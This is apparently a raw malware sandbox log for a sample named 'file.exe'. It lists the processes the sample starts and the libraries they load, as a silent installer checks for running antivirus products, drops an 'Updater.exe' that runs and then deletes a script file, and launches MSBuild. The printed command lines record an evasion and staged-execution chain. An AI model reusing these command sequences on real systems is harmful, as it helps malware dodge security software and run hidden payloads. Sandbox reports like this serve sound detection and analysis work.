Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" /VERYSILENT
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp" /SL5="$2047E,2820349,845824,C:\Users\user\Desktop\file.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe"
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process created: C:\Users\user\AppData\Local\hangbird\Updater.exe "C:\Users\user\AppData\Local\hangbird\\Updater.exe" "C:\Users\user\AppData\Local\hangbird\\caliculus.csv"
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\bYrIyAT.a3x && del C:\ProgramData\\bYrIyAT.a3x
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\hangbird\Updater.exe updater.exe C:\ProgramData\\bYrIyAT.a3x
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp" /SL5="$40476,2820349,845824,C:\Users\user\Desktop\file.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe" /VERYSILENT Jump to behavior
Source: C:\Users\user\Desktop\file.exe Process created: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp "C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp" /SL5="$2047E,2820349,845824,C:\Users\user\Desktop\file.exe" /VERYSILENT Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH | find /I "wrsa.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH | find /I "opssvc.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH | find /I "avastui.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Process created: C:\Users\user\AppData\Local\hangbird\Updater.exe "C:\Users\user\AppData\Local\hangbird\\Updater.exe" "C:\Users\user\AppData\Local\hangbird\\caliculus.csv" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "wrsa.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq opssvc.exe" /FO CSV /NH Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "opssvc.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avastui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "avgui.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "nswscsvc.exe" Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\find.exe find /I "sophoshealth.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c ping -n 5 127.0.0.1 >nul && updater.exe C:\ProgramData\\bYrIyAT.a3x && del C:\ProgramData\\bYrIyAT.a3x Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\PING.EXE ping -n 5 127.0.0.1 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Local\hangbird\Updater.exe updater.exe C:\ProgramData\\bYrIyAT.a3x Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-09MIB.tmp\file.tmp Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: wtsapi32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: winsta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-OR928.tmp\file.tmp Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: winsta.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\tasklist.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: ulib.dll Jump to behavior
Source: C:\Windows\System32\find.exe Section loaded: fsutilext.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: winnsi.dll Jump to behavior
Source: C:\Windows\SysWOW64\PING.EXE Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: winmm.dll Jump to behavior
Source: C:\Users\user\AppData\Local\hangbird\Updater.exe Section loaded: mpr.dll Jump to behavior
